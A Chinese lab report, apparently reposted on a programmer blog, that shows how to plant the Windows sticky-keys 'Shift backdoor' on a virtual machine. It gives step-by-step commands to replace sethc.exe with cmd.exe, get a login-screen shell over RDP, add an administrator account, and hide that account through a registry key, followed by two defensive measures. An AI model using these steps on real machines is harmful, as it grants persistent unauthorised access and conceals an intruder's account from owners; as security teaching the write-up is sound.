大家好,又见面了,我是你们的朋友全栈君。
一、实验目的及要求
1. 学会创建Shift后门
2.掌握shift后门的原理
二、实验设备(环境)及要求
PC机, VC 等,虚拟云平台
三、实验内容与步骤
1.在192.168.1.3的虚拟机上打开cmd命令指示符;
2.输入“ cd c:WINDOWSsystem32”,进入该文件夹;
3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份;
4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”;
5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用;
6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序;
7.输入“192.168.1.3”,点击连接;
8.当出现登录界面时,按5下shift键可进入目标机的cmd中;
9.在cmd中输入“net user hack 123 /add”,创建用户;
10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活;
11.用hack用户登录目标机。
四、实验结果与数据处理
1.对192.168.1.3的虚拟机的命令操作
2.使用粘滞键
3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活
4.成功登录目标机
五、分析与讨论
1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。
2.防范措施:
(1)禁用shift键的粘滞功能;
(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。
3.如何创建隐藏用户:
创建用户后,按win r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/192139.html原文链接:https://javaforall.cn
